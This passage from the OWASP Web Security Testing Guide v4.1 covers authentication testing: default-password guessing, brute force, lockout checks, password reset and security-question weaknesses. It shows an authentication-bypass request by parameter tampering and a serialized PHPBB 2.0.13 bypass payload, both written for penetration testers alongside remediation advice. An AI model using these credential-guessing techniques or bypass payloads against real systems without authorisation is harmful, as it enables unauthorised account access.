similar manner. In addition try an empty password or one of the following</p><p>“password”, “pass123”, “password123”, “admin”, or “guest” with the above accounts or any other enumerated</p><p>accounts. Further permutations of the above can also be attempted. If these passwords fail, it may be worth using a</p><p>common username and password list and attempting multiple requests against the application. This can, of course,</p><p>be scripted to save time.</p><p>Application administrative users are often named after the application or organization. This means if you are</p><p>testing an application named “Obscurity”, try using obscurity/obscurity or any other similar combination as the</p><p>username and password.</p><p>When performing a test for a customer, attempt using names of contacts you have received as usernames with any</p><p>common passwords. Customer email addresses mail reveal the user accounts naming convention: if employee</p><p>John Doe has the email address jdoe@example.com, you can try to find the names of system administrators on</p><p>social media and guess their username by applying the same naming convention to their name.</p><p>Attempt using all the above usernames with blank passwords.</p><p>Review the page source and JavaScript either through a proxy or by viewing the source. Look for any references to</p><p>users and passwords in the source. For example “If username=’admin’ then starturl=/admin.asp else /index.asp”</p><p>(for a successful log in versus a failed log in). Also, if you have a valid account, then log in and view every request</p><p>and response for a valid log in versus an invalid log in, such as additional hidden parameters, interesting GET</p><p>request (login=yes), etc.</p><p>Look for account names and passwords written in comments in the source code. Also look in backup directories for</p><p>source code (or backups of source code) that may contain interesting comments and code.</p><p>Testing for Default Password of New Accounts</p><p>It can also occur that when a new account is created in an application the account is assigned a default password. This</p><p>password could have some standard characteristics making it predictable. If the user does not change it on first usage</p><p>(this often happens if the user is not forced to change it) or if the user has not yet logged on to the application, this can</p><p>lead an attacker to gain unauthorized access to the application.</p><p>The advice given before about a possible lockout policy and verbose error messages are also applicable here when</p><p>testing for default passwords.</p><p>The following steps can be applied to test for these types of default credentials:</p><p>Looking at the User Registration page may help to determine the expected format and minimum or maximum</p><p>length of the application usernames and passwords. If a user registration page does not exist, determine if the</p><p>organization uses a standard naming convention for user names such as their email address or the name before</p><p>the “@” in the email.</p><p>Try to extrapolate from the application how usernames are generated. For example, can a user choose his/her own</p><p>username or does the system generate an account name for the user based on some personal information or by</p><p>using a predictable sequence? If the application does generate the account names in a predictable sequence,</p><p>such as user7811, try fuzzing all possible accounts recursively. If you can identify a different response from the</p><p>application when using a valid username and a wrong password, then you can try a brute force attack on the valid</p><p>username (or quickly try any of the identified common passwords above or in the reference section).</p><p>Try to determine if the system generated password is predictable. To do this, create many new accounts quickly</p><p>after one another so that you can compare and determine if the passwords are predictable. If predictable, try to</p><p>correlate these with the usernames, or any enumerated accounts, and use them as a basis for a brute force attack.</p><p>mailto:jdoe@example.com</p><p>Web Security Testing Guide v4.1</p><p>146</p><p>If you have identified the correct naming convention for the user name, try to “brute force” passwords with some</p><p>common predictable sequence like for example dates of birth.</p><p>Attempt using all the above usernames with blank passwords or using the username also as password value.</p><p>Gray-Box Testing</p><p>The following steps rely on an entirely gray-box approach. If only some of this information is available to you, refer to</p><p>black-box testing to fill</p><p>the gaps.</p><p>Talk to the IT personnel to determine which passwords they use for administrative access and how administration</p><p>of the application is undertaken.</p><p>Ask IT personnel if default passwords are changed and if default user accounts are disabled.</p><p>Examine the user database for default credentials as described in the black-box testing section. Also check for</p><p>empty password fields.</p><p>Examine the code for hard coded usernames and passwords.</p><p>Check for configuration files that contain usernames and passwords.</p><p>Examine the password policy and, if the application generates its own passwords for new users, check the policy</p><p>in use for this procedure.</p><p>Tools</p><p>Burp Intruder</p><p>THC Hydra</p><p>Nikto 2</p><p>References</p><p>CIRT</p><p>https://portswigger.net/burp</p><p>https://github.com/vanhauser-thc/thc-hydra</p><p>https://www.cirt.net/nikto2</p><p>https://cirt.net/passwords</p><p>Web Security Testing Guide v4.1</p><p>147</p><p>Testing for Weak Lock Out Mechanism</p><p>ID</p><p>WSTG-ATHN-03</p><p>Summary</p><p>Account lockout mechanisms are used to mitigate brute force password guessing attacks. Accounts are typically locked</p><p>after 3 to 5 unsuccessful login attempts and can only be unlocked after a predetermined period of time, via a self-</p><p>service unlock mechanism, or intervention by an administrator. Account lockout mechanisms require a balance</p><p>between protecting accounts from unauthorized access and protecting users from being denied authorized access.</p><p>Note that this test should cover all aspects of authentication where lockout mechanisms would be appropriate, e.g.</p><p>when the user is presented with security questions during forgotten password mechanisms (see Testing for Weak</p><p>security question/answer).</p><p>Without a strong lockout mechanism, the application may be susceptible to brute force attacks. After a successful brute</p><p>force attack, a malicious user could have access to:</p><p>Confidential information or data: Private sections of a web application could disclose confidential documents,</p><p>users’ profile data, financial information, bank details, users’ relationships, etc.</p><p>Administration panels: These sections are used by webmasters to manage (modify, delete, add) web application</p><p>content, manage user provisioning, assign different privileges to the users, etc.</p><p>Opportunities for further attacks: authenticated sections of a web application could contain vulnerabilities that are</p><p>not present in the public section of the web application and could contain advanced functionality that is not</p><p>available to public users.</p><p>Test Objectives</p><p>1. Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing.</p><p>2. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.</p><p>How to Test</p><p>Typically, to test the strength of lockout mechanisms, you will need access to an account that you are willing or can</p><p>afford to lock. If you have only one account with which you can log on to the web application, perform this test at the end</p><p>of you test plan to avoid that you cannot continue your testing due to a locked account.</p><p>To evaluate the account lockout mechanism’s ability to mitigate brute force password guessing, attempt an invalid log</p><p>in by using the incorrect password a number of times, before using the correct password to verify that the account was</p><p>locked out. An example test may be as follows:</p><p>1. Attempt to log in with an incorrect password 3 times.</p><p>2. Successfully log in with the correct password, thereby showing that the lockout mechanism doesn’t trigger after 3</p><p>incorrect authentication attempts.</p><p>3. Attempt to log in with an incorrect password 4 times.</p><p>4. Successfully log in with the correct password, thereby showing that the lockout mechanism doesn’t trigger after 4</p><p>incorrect authentication attempts.</p><p>5. Attempt to log in with an incorrect password 5 times.</p><p>6. Attempt to log in with the correct password. The application returns “Your account is locked out.”, thereby</p><p>confirming that the account is locked out after 5 incorrect authentication attempts.</p><p>Web Security Testing Guide v4.1</p><p>148</p><p>7. Attempt to log in with the correct password 5 minutes later. The application returns “Your account is locked out.”,</p><p>thereby showing that the lockout mechanism does not automatically unlock after 5 minutes.</p><p>8. Attempt to log in with the correct password 10 minutes later. The application returns “Your account is locked out.”,</p><p>thereby showing that the lockout mechanism does not automatically unlock after 10 minutes.</p><p>9. Successfully log in with the correct password 15 minutes later, thereby showing that the lockout mechanism</p><p>automatically unlocks after a 10 to 15 minute period.</p><p>A CAPTCHA may hinder brute force attacks, but they can come with their own set of weaknesses, and should not</p><p>replace a lockout mechanism.</p><p>To evaluate the unlock mechanism’s resistance to unauthorized account unlocking, initiate the unlock mechanism and</p><p>look for weaknesses. Typical unlock mechanisms may involve secret questions or an emailed unlock link. The unlock</p><p>link should be a unique one-time link, to stop an attacker from guessing or replaying the link and performing brute force</p><p>attacks in batches. Secret questions and answers should be strong (see Testing for Weak Security Question/Answer).</p><p>Note that an unlock mechanism should only be used for unlocking accounts. It is not the same as a password recovery</p><p>mechanism.</p><p>Factors to consider when implementing an account lockout mechanism:</p><p>1. What is the risk of brute force password guessing against the application?</p><p>2. Is a CAPTCHA sufficient to mitigate this risk?</p><p>3. Is a client-side lockout mechanism being used (e.g., JavaScript)? (If so, disable the client-side code to test.)</p><p>4. Number of unsuccessful log in attempts before lockout. If the lockout threshold is to low then valid users may be</p><p>locked out too often. If the lockout threshold is to high then the more attempts an attacker can make to brute force</p><p>the account before it will be locked. Depending on the application’s purpose, a range of 5 to 10 unsuccessful</p><p>attempts is typical lockout threshold.</p><p>5. How will accounts be unlocked?</p><p>i. Manually by an administrator: this is the most secure lockout method, but may cause inconvenience to users</p><p>and take up the administrator’s “valuable” time.</p><p>a. Note that the administrator should also have a recovery method in case his account gets locked.</p><p>b. This unlock mechanism may lead to a denial-of-service attack if an attacker’s goal is to lock the accounts</p><p>of all users of the web application.</p><p>ii. After a period of time: What is the lockout duration? Is this sufficient for the application being protected? E.g. a</p><p>5 to 30 minute lockout duration may be a good compromise between mitigating brute force attacks and</p><p>inconveniencing valid users.</p><p>iii. Via a self-service mechanism: As stated before, this self-service mechanism must be secure enough to avoid</p><p>that the attacker can unlock accounts himself.</p><p>References</p><p>See the OWASP article on Brute Force Attacks.</p><p>Remediation</p><p>Apply account unlock mechanisms depending on the risk level. In order from lowest to highest assurance:</p><p>1. Time-based lockout and unlock.</p><p>2. Self-service unlock (sends unlock email to registered email address).</p><p>3. Manual administrator unlock.</p><p>4. Manual administrator unlock with positive user identification.</p><p>https://owasp.org/www-community/attacks/Brute_force_attack</p><p>Web Security Testing Guide v4.1</p><p>149</p><p>Testing for Bypassing Authentication Schema</p><p>ID</p><p>WSTG-ATHN-04</p><p>Summary</p><p>In computer security, authentication is the process of attempting to verify the digital identity of the sender of a</p><p>communication. A common example of such a process is the log on process. Testing the authentication schema means</p><p>understanding how the authentication process works and using that information to circumvent the authentication</p><p>mechanism.</p><p>While most applications require authentication to gain access to private information or to execute tasks, not every</p><p>authentication method is able to provide adequate security. Negligence, ignorance, or simple understatement of</p><p>security threats often result in authentication schemes</p><p>that can be bypassed by simply skipping the log in page and</p><p>directly calling an internal page that is supposed to be accessed only after authentication has been performed.</p><p>In addition, it is often possible to bypass authentication measures by tampering with requests and tricking the</p><p>application into thinking that the user is already authenticated. This can be accomplished either by modifying the given</p><p>URL parameter, by manipulating the form, or by counterfeiting sessions.</p><p>Problems related to the authentication schema can be found at different stages of the software development life cycle</p><p>(SDLC), like the design, development, and deployment phases:</p><p>In the design phase errors can include a wrong definition of application sections to be protected, the choice of not</p><p>applying strong encryption protocols for securing the transmission of credentials, and many more.</p><p>In the development phase errors can include the incorrect implementation of input validation functionality or not</p><p>following the security best practices for the specific language.</p><p>In the application deployment phase, there may be issues during the application setup (installation and</p><p>configuration activities) due to a lack in required technical skills or due to the lack of good documentation.</p><p>How to Test</p><p>Black-Box Testing</p><p>There are several methods of bypassing the authentication schema that is used by a web application:</p><p>Direct page request (forced browsing)</p><p>Parameter modification</p><p>Session ID prediction</p><p>SQL injection</p><p>Direct Page Request</p><p>If a web application implements access control only on the log in page, the authentication schema could be bypassed.</p><p>For example, if a user directly requests a different page via forced browsing, that page may not check the credentials of</p><p>the user before granting access. Attempt to directly access a protected page through the address bar in your browser to</p><p>test using this method.</p><p>https://owasp.org/www-community/attacks/Forced_browsing</p><p>Web Security Testing Guide v4.1</p><p>150</p><p>Figure 4.4.4-1: Direct Request to Protected Page</p><p>Parameter Modification</p><p>Another problem related to authentication design is when the application verifies a successful log in on the basis of a</p><p>fixed value parameters. A user could modify these parameters to gain access to the protected areas without providing</p><p>valid credentials. In the example below, the “authenticated” parameter is changed to a value of “yes”, which allows the</p><p>user to gain access. In this example, the parameter is in the URL, but a proxy could also be used to modify the</p><p>parameter, especially when the parameters are sent as form elements in a POST request or when the parameters are</p><p>stored in a cookie.</p><p>http://www.site.com/page.asp?authenticated=no</p><p>raven@blackbox /home $nc www.site.com 80</p><p>GET /page.asp?authenticated=yes HTTP/1.0</p><p>HTTP/1.1 200 OK</p><p>Date: Sat, 11 Nov 2006 10:22:44 GMT</p><p>Server: Apache</p><p>Connection: close</p><p>Content-Type: text/html; charset=iso-8859-1</p><p><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"></p><p><HTML><HEAD></p><p></HEAD><BODY></p><p><H1>You Are Authenticated</H1></p><p></BODY></HTML></p><p>Web Security Testing Guide v4.1</p><p>151</p><p>Figure 4.4.4-2: Parameter Modified Request</p><p>Session ID Prediction</p><p>Many web applications manage authentication by using session identifiers (session IDs). Therefore, if session ID</p><p>generation is predictable, a malicious user could be able to find a valid session ID and gain unauthorized access to the</p><p>application, impersonating a previously authenticated user.</p><p>In the following figure, values inside cookies increase linearly, so it could be easy for an attacker to guess a valid</p><p>session ID.</p><p>Figure 4.4.4-3: Cookie Values Over Time</p><p>In the following figure, values inside cookies change only partially, so it’s possible to restrict a brute force attack to the</p><p>defined fields shown below.</p><p>Web Security Testing Guide v4.1</p><p>152</p><p>Figure 4.4.4-4: Partially Changed Cookie Values</p><p>SQL Injection (HTML Form Authentication)</p><p>SQL Injection is a widely known attack technique. This section is not going to describe this technique in detail as there</p><p>are several sections in this guide that explain injection techniques beyond the scope of this section.</p><p>Figure 4.4.4-5: SQL Injection</p><p>The following figure shows that with a simple SQL injection attack, it is sometimes possible to bypass the authentication</p><p>form.</p><p>Web Security Testing Guide v4.1</p><p>153</p><p>Figure 4.4.4-6: Simple SQL Injection Attack</p><p>Gray-Box Testing</p><p>If an attacker has been able to retrieve the application source code by exploiting a previously discovered vulnerability</p><p>(e.g., directory traversal), or from a web repository (Open Source Applications), it could be possible to perform refined</p><p>attacks against the implementation of the authentication process.</p><p>In the following example (PHPBB 2.0.13 - Authentication Bypass Vulnerability), at line 5 the unserialize() function</p><p>parses a user supplied cookie and sets values inside the $row array. At line 10 the user’s MD5 password hash stored</p><p>inside the back end database is compared to the one supplied.</p><p>1. if ( isset($HTTP_COOKIE_VARS[$cookiename . '_sid']) ||</p><p>2. {</p><p>3. $sessiondata = isset( $HTTP_COOKIE_VARS[$cookiename . '_data'] ) ?</p><p>4.</p><p>5. unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data'])) : array();</p><p>6.</p><p>7. $sessionmethod = SESSION_METHOD_COOKIE;</p><p>8. }</p><p>9.</p><p>10. if( md5($password) == $row['user_password'] && $row['user_active'] )</p><p>11.</p><p>12. {</p><p>13. $autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;</p><p>14. }</p><p>In PHP, a comparison between a string value and a boolean value (1 - “TRUE”) is always “TRUE”, so by supplying the</p><p>following string (the important part is “b:1”) to the unserialize() function, it is possible to bypass the authentication</p><p>control:</p><p>a:2:{s:11: “ autologinid ” ;b:1;s:6: “ userid ” ;s:1: “ 2 ” ;}</p><p>Tools</p><p>Web Security Testing Guide v4.1</p><p>154</p><p>WebGoat</p><p>OWASP Zed Attack Proxy (ZAP)</p><p>References</p><p>Whitepapers</p><p>Mark Roxberry: “PHPBB 2.0.13 vulnerability”</p><p>David Endler: “Session ID Brute Force Exploitation and Prediction”</p><p>https://owasp.org/www-project-webgoat/</p><p>https://www.zaproxy.org/</p><p>https://www.cgisecurity.com/lib/SessionIDs.pdf</p><p>Web Security Testing Guide v4.1</p><p>155</p><p>Testing for Vulnerable Remember Password</p><p>ID</p><p>WSTG-ATHN-05</p><p>Summary</p><p>Credentials are the most widely used authentication technology. Due to such a wide usage of username-password</p><p>pairs, users are no longer able to properly handle their credentials across the multitude of used applications.</p><p>In order to assist users with their credentials, multiple technologies surfaced:</p><p>Applications provide a remember me functionality that allows the user to stay authenticated for long periods of</p><p>time, without asking the user again for their credentials.</p><p>Password Managers - including browser password managers - that allow the user to store their credentials in a</p><p>secure manner and later on inject them in user-forms without any user intervention.</p><p>How to Test</p><p>As these methods provide a better user experience and allow the user to forget all about their credentials, they</p><p>increase the attack surface area. Some applications:</p><p>Store the credentials in an encoded fashion in the browser’s storage mechanisms, which can be verified by</p><p>following the web storage testing scenario and going through the session analysis scenarios. Credentials</p><p>shouldn’t be stored in any way in the client-side application, and should be substitued by tokens generated from</p><p>the server side.</p><p>Automatically inject the user’s credentials that can be abused by:</p><p>ClickJacking attacks.</p><p>CSRF attacks.</p><p>Tokens should be analyzed in terms of token-lifetime, where some tokens never expire and put the users in danger</p><p>if those tokens ever get stolen. Make sure to follow the session timeout testing scenario.</p><p>Remediation</p><p>Follow session management good practices.</p><p>Ensure that no credentials are stored in clear text or are easily retrievable in encoded or encrypted forms in</p><p>browser storage mechanisms; they should be stored on the server side and follow password storage good</p><p>practices.</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</p><p>Web Security Testing Guide v4.1</p><p>156</p><p>Testing for Browser Cache Weaknesses</p><p>ID</p><p>WSTG-ATHN-06</p><p>Summary</p><p>In this phase the tester checks that the application correctly instructs the browser to not retain sensitive data.</p><p>Browsers can store information for purposes of caching and history. Caching is used to improve performance, so that</p><p>previously displayed information doesn’t need to be downloaded again. History mechanisms are used for user</p><p>convenience, so the user can see exactly what they saw at the time when the resource was retrieved. If sensitive</p><p>information is displayed to the user (such as their address, credit card details, Social Security Number, or username),</p><p>then this information could be stored for purposes of caching or history, and therefore retrievable through examining the</p><p>browser’s cache or by simply pressing the browser’s Back button.</p><p>Test Objectives</p><p>The objective of this test is to evaluate whether or not the application stores sensitive information in client accessible</p><p>locations or in a manner which does not prevent their access or review outside of an authenticated and authorized</p><p>session. Specifically, this tests whether sensitive information is stored:</p><p>On disk or in memory, where it might be retrieved after intended use.</p><p>In such a way that using the Back button may allow a user (or attacker) to return to a previously displayed screen.</p><p>How to Test</p><p>Browser History</p><p>Technically, the Back button is a history and not a cache (see https://www.w3.org/Protocols/rfc2616/rfc2616-</p><p>sec13.html#sec13.13). The cache and the history are two different entities. However, they share the same weakness of</p><p>presenting previously displayed sensitive information.</p><p>The first and simplest test consists of entering sensitive information into the application and logging out. Then the tester</p><p>clicks the Back button of the browser to check whether previously displayed sensitive information can be accessed</p><p>whilst unauthenticated.</p><p>If by pressing the Back button the tester can access previous pages but not access new ones, then it is not an</p><p>authentication issue, but a browser history issue. If these pages contain sensitive data, it means that the application did</p><p>not forbid the browser from storing it.</p><p>Authentication does not necessarily need to be involved in the testing. For example, when a user enters their email</p><p>address in order to sign up to a newsletter, this information could be retrievable if not properly handled.</p><p>The Back button can be stopped from showing sensitive data. This can be done by:</p><p>Delivering the page over HTTPS.</p><p>Setting Cache-Control: must-revalidate</p><p>Browser Cache</p><p>Here testers check that the application does not leak any sensitive data into the browser cache. In order to do that, they</p><p>can use a proxy (such as OWASP ZAP) and search through the server responses that belong to the session, checking</p><p>that for every page that contains sensitive information the server instructed the browser not to cache any data. Such a</p><p>directive can be issued in the HTTP response headers with the following directives:</p><p>https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html#sec13.13</p><p>Web Security Testing Guide v4.1</p><p>157</p><p>Cache-Control: no-cache, no-store</p><p>Expires: 0</p><p>Pragma: no-cache</p><p>These directives are generally robust, although additional flags may be necessary for the Cache-Control header in</p><p>order to better prevent persistently linked files on the file system. These include:</p><p>Cache-Control: must-revalidate, max-age=0, s-maxage=0</p><p>HTTP/1.1:</p><p>Cache-Control: no-cache</p><p>HTTP/1.0:</p><p>Pragma: no-cache</p><p>Expires: <past date or illegal value (e.g., 0)></p><p>For instance, if testers are testing an e-commerce application, they should look for all pages that contain a credit card</p><p>number or some other financial information, and check that all those pages enforce the no-cache directive. If they find</p><p>pages that contain critical information but that fail to instruct the browser not to cache their content, they know that</p><p>sensitive information will be stored on the disk, and they can double-check this simply by looking for the page in the</p><p>browser cache.</p><p>The exact location where that information is stored depends on the client operating system and on the browser that has</p><p>been used. Here are some examples:</p><p>Mozilla Firefox:</p><p>Unix/Linux: ~/.cache/mozilla/firefox/</p><p>Windows: C:\Users\<user_name>\AppData\Local\Mozilla\Firefox\Profiles\<profile-id>\Cache2\</p><p>Internet Explorer:</p><p>C:\Users\<user_name>\AppData\Local\Microsoft\Windows\INetCache\</p><p>Chrome:</p><p>Windows: C:\Users\<user_name>\AppData\Local\Google\Chrome\User Data\Default\Cache</p><p>Unix/Linux: ~/.cache/google-chrome</p><p>Reviewing Cached Information</p><p>Firefox provides functionality for viewing cached information, which may be to your benefit as a tester. Of course the</p><p>industry has also produced various extensions, and external apps which you may prefer or need for Chrome, Internet</p><p>Explorer, or Edge.</p><p>Cache details are also available via developer tools in most modern browsers, such as Firefox, Chrome, and Edge.</p><p>With Firefox it is also possible to use the URL about:cache to check cache details.</p><p>Check Handling for Mobile Browsers</p><p>Handling of cache directives may be completely different for mobile browsers. Therefore, testers should start a new</p><p>browsing session with clean caches and take advantage of features like Chrome’s Device Mode or Firefox’s</p><p>Responsive Design Mode to re-test or separately test the concepts outlined above.</p><p>Additionally, personal proxies such as ZAP and Burp Suite allow the tester to specify which User-Agent should be</p><p>sent by their spiders/crawlers. This could be set to match a mobile browser User-Agent string and used to see which</p><p>caching directives are sent by the application being tested.</p><p>Gray-Box Testing</p><p>https://developer.mozilla.org/en-US/docs/Tools/Storage_Inspector#Cache_Storage</p><p>https://developers.google.com/web/tools/chrome-devtools/storage/cache</p><p>https://developers.google.com/web/tools/chrome-devtools/device-mode</p><p>https://developer.mozilla.org/en-US/docs/Tools/Responsive_Design_Mode</p><p>Web Security Testing Guide v4.1</p><p>158</p><p>The methodology for testing is equivalent to the black-box case, as in both scenarios testers have full access to the</p><p>server response headers and to the HTML code. However, with gray-box testing, the tester may have access to account</p><p>credentials that will allow them to test sensitive pages that are accessible only to authenticated users.</p><p>Tools</p><p>OWASP Zed Attack Proxy</p><p>References</p><p>Whitepapers</p><p>Caching in HTTP</p><p>https://www.zaproxy.org/</p><p>https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html</p><p>Web Security Testing Guide v4.1</p><p>159</p><p>Testing for Weak Password Policy</p><p>ID</p><p>WSTG-ATHN-07</p><p>Summary</p><p>The most prevalent and most easily administered authentication mechanism is a static password. The password</p><p>represents the keys to the kingdom, but is often subverted by users in the name of usability. In each of the recent high</p><p>profile hacks that have revealed user credentials, it is lamented that most common passwords are still: 123456 ,</p><p>password and qwerty .</p><p>Test Objectives</p><p>Determine the resistance of the application against brute force password guessing using available password</p><p>dictionaries by evaluating the length, complexity, reuse and aging requirements of passwords.</p><p>How to Test</p><p>1. What characters are permitted and forbidden for use within a password? Is the user required to use characters</p><p>from different character sets such as lower and uppercase letters, digits and special symbols?</p><p>2. How often can a user change their password? How quickly can a user change their password after a previous</p><p>change? Users may bypass password history requirements by changing their password 5 times in a row so that</p><p>after the last password change they have configured their initial password again.</p><p>3. When must a user change their password?</p><p>Both NIST and NCSC recommend against</p><p>forcing regular password expiry, although it may be required by</p><p>standards such as PCI DSS.</p><p>4. How often can a user reuse a password? Does the application maintain a history of the user’s previous used 8</p><p>passwords?</p><p>5. How different must the next password be from the last password?</p><p>6. Is the user prevented from using his username or other account information (such as first or last name) in the</p><p>password?</p><p>7. What are the minimum and maximum password lengths that can be set, and are they appropriate for the sensitivity</p><p>of the account and application?</p><p>8. Is it possible set common passwords such as Password1 or 123456 ?</p><p>References</p><p>Brute Force Attacks</p><p>Remediation</p><p>To mitigate the risk of easily guessed passwords facilitating unauthorized access there are two solutions: introduce</p><p>additional authentication controls (i.e. two-factor authentication) or introduce a strong password policy. The simplest</p><p>and cheapest of these is the introduction of a strong password policy that ensures password length, complexity, reuse</p><p>and aging; although ideally both of them should be implemented.</p><p>https://pages.nist.gov/800-63-3/sp800-63b.html#memsecretver</p><p>https://www.ncsc.gov.uk/collection/passwords/updating-your-approach#PasswordGuidance:UpdatingYourApproach-Don'tenforceregularpasswordexpiry</p><p>https://owasp.org/www-community/attacks/Brute_force_attack</p><p>Web Security Testing Guide v4.1</p><p>160</p><p>Testing for Weak Security Question Answer</p><p>ID</p><p>WSTG-ATHN-08</p><p>Summary</p><p>Often called “secret” questions and answers, security questions and answers are often used to recover forgotten</p><p>passwords (see Testing for weak password change or reset functionalities, or as extra security on top of the password.</p><p>They are typically generated upon account creation and require the user to select from some pre-generated questions</p><p>and supply an appropriate answer. They may allow the user to generate their own question and answer pairs. Both</p><p>methods are prone to insecurities.Ideally, security questions should generate answers that are only known by the user,</p><p>and not guessable or discoverable by anybody else. This is harder than it sounds. Security questions and answers rely</p><p>on the secrecy of the answer. Questions and answers should be chosen so that the answers are only known by the</p><p>account holder. However, although a lot of answers may not be publicly known, most of the questions that websites</p><p>implement promote answers that are pseudo-private.</p><p>Pre-generated Questions</p><p>The majority of pre-generated questions are fairly simplistic in nature and can lead to insecure answers. For example:</p><p>The answers may be known to family members or close friends of the user, e.g. “What is your mother’s maiden</p><p>name?”, “What is your date of birth?”</p><p>The answers may be easily guessable, e.g. “What is your favorite color?”, “What is your favorite baseball team?”</p><p>The answers may be brute forcible, e.g. “What is the first name of your favorite high school teacher?” - the answer</p><p>is probably on some easily downloadable lists of popular first names, and therefore a simple brute force attack can</p><p>be scripted.</p><p>The answers may be publicly discoverable, e.g. “What is your favorite movie?” - the answer may easily be found on</p><p>the user’s social media profile page.</p><p>Self-generated Questions</p><p>The problem with having users to generate their own questions is that it allows them to generate very insecure</p><p>questions, or even bypass the whole point of having a security question in the first place. Here are some real world</p><p>examples that illustrate this point:</p><p>“What is 1+1?”</p><p>“What is your username?”</p><p>“My password is S3cur|ty!”</p><p>How to Test</p><p>Testing for Weak Pre-generated Questions</p><p>Try to obtain a list of security questions by creating a new account or by following the “I don’t remember my password”-</p><p>process. Try to generate as many questions as possible to get a good idea of the type of security questions that are</p><p>asked. If any of the security questions fall in the categories described above, they are vulnerable to being attacked</p><p>(guessed, brute-forced, available on social media, etc.).</p><p>Testing for Weak Self-Generated Questions</p><p>Try to create security questions by creating a new account or by configuring your existing account’s password recovery</p><p>properties. If the system allows the user to generate their own security questions, it is vulnerable to having insecure</p><p>questions created. If the system uses the self-generated security questions during the forgotten password functionality</p><p>Web Security Testing Guide v4.1</p><p>161</p><p>and if usernames can be enumerated (see Testing for Account Enumeration and Guessable User Account, then it</p><p>should be easy for the tester to enumerate a number of self-generated questions. It should be expected to find several</p><p>weak self-generated questions using this method.</p><p>Testing for Brute-forcible Answers</p><p>Use the methods described in Testing for Weak lock out mechanism to determine if a number of incorrectly supplied</p><p>security answers trigger a lockout mechanism.</p><p>The first thing to take into consideration when trying to exploit security questions is the number of questions that need to</p><p>be answered. The majority of applications only need the user to answer a single question, whereas some critical</p><p>applications may require the user to answer two or even more questions.</p><p>The next step is to assess the strength of the security questions. Could the answers be obtained by a simple Google</p><p>search or with social engineering attack? As a penetration tester, here is a step-by-step walk-through of exploiting a</p><p>security question scheme:</p><p>Does the application allow the end-user to choose the question that needs to be answered? If so, focus on</p><p>questions which have:</p><p>A “public” answer; for example, something that could be find with a simple search-engine query.</p><p>A factual answer such as a “first school” or other facts which can be looked up.</p><p>Few possible answers, such as “what model was your first car”. These questions would present the attacker</p><p>with a short list of possible answers, and based on statistics the attacker could rank answers from most to least</p><p>likely.</p><p>Determine how many guesses you have if possible.</p><p>Does the password reset allow unlimited attempts?</p><p>Is there a lockout period after X incorrect answers? Keep in mind that a lockout system can be a security</p><p>problem in itself, as it can be exploited by an attacker to launch a Denial of Service against legitimate users.</p><p>Pick the appropriate question based on analysis from the above points, and do research to determine the most</p><p>likely answers.</p><p>The key to successfully exploiting and bypassing a weak security question scheme is to find a question or set of</p><p>questions which give the possibility of easily finding the answers. Always look for questions which can give you the</p><p>greatest statistical chance of guessing the correct answer, if you are completely unsure of any of the answers. In the</p><p>end, a security question scheme is only as strong as the weakest question.</p><p>References</p><p>The Curse of the Secret Question</p><p>The OWASP Security Questions Cheat Sheet</p><p>https://www.schneier.com/essay-081.html</p><p>https://cheatsheetseries.owasp.org/cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html</p><p>Web Security Testing Guide v4.1</p><p>162</p><p>Testing for Weak Password Change or Reset Functionalities</p><p>ID</p><p>WSTG-ATHN-09</p><p>Summary</p><p>The password change and reset function of an application is a self-service password change or reset mechanism for</p><p>users. This self-service mechanism allows users to quickly change or reset their password without an administrator</p><p>intervening. When passwords are changed they are typically changed within the application. When passwords are</p><p>reset they are either rendered within the application or emailed to the user. This may indicate that the passwords are</p><p>stored in plain text or in a decryptable format.</p><p>Test Objectives</p><p>1. Determine the resistance of the application to subversion of the account change process allowing someone to</p><p>change the password of an account.</p><p>2. Determine the resistance of the passwords reset functionality against</p><p>guessing or bypassing.</p><p>How to Test</p><p>For both password change and password reset it is important to check:</p><p>1. if users, other than administrators, can change or reset passwords for accounts other than their own.</p><p>2. if users can manipulate or subvert the password change or reset process to change or reset the password of</p><p>another user or administrator.</p><p>3. if the password change or reset process is vulnerable to CSRF.</p><p>Test Password Reset</p><p>In addition to the previous checks it is important to verify the following:</p><p>What information is required to reset the password?</p><p>The first step is to check whether secret questions are required. Sending the password (or a password reset link) to</p><p>the user email address without first asking for a secret question means relying 100% on the security of that email</p><p>address, which is not suitable if the application needs a high level of security. On the other hand, if secret questions</p><p>are used, the next step is to assess their strength. This specific test is discussed in detail in the Testing for Weak</p><p>security question/answer paragraph of this guide.</p><p>How are reset passwords communicated to the user? The most insecure scenario here is if the password reset tool</p><p>shows you the password; this gives the attacker the ability to log into the account, and unless the application</p><p>provides information about the last log in the victim would not know that their account has been compromised. A</p><p>less insecure scenario is if the password reset tool forces the user to immediately change their password. While</p><p>not as stealthy as the first case, it allows the attacker to gain access and locks the real user out.</p><p>The best security is achieved if the password reset is done via an email to the address the user initially registered</p><p>with, or some other email address; this forces the attacker to not only guess at which email account the password</p><p>reset was sent to (unless the application show this information) but also to compromise that email account in order</p><p>to obtain the temporary password or the password reset link.</p><p>Are reset passwords generated randomly? The most insecure scenario here is if the application sends or</p><p>visualizes the old password in clear text because this means that passwords are not stored in a hashed form,</p><p>which is a security issue in itself.</p><p>Web Security Testing Guide v4.1</p><p>163</p><p>The best security is achieved if passwords are randomly generated with a secure algorithm that cannot be derived.</p><p>Is the reset password functionality requesting confirmation before changing the password? To limit denial-of-</p><p>service attacks the application should email a link to the user with a random token, and only if the user visits the</p><p>link then the reset procedure is completed. This ensures that the current password will still be valid until the reset</p><p>has been confirmed.</p><p>Test Password Change</p><p>In addition to the previous test it is important to verify:</p><p>Is the old password requested to complete the change?</p><p>The most insecure scenario here is if the application permits the change of the password without requesting the</p><p>current password. Indeed if an attacker is able to take control of a valid session they could easily change the</p><p>victim’s password. See also Testing for Weak password policy paragraph of this guide.</p><p>References</p><p>OWASP Forgot Password Cheat Sheet</p><p>Remediation</p><p>The password change or reset function is a sensitive function and requires some form of protection, such as requiring</p><p>users to re-authenticate or presenting the user with confirmation screens during the 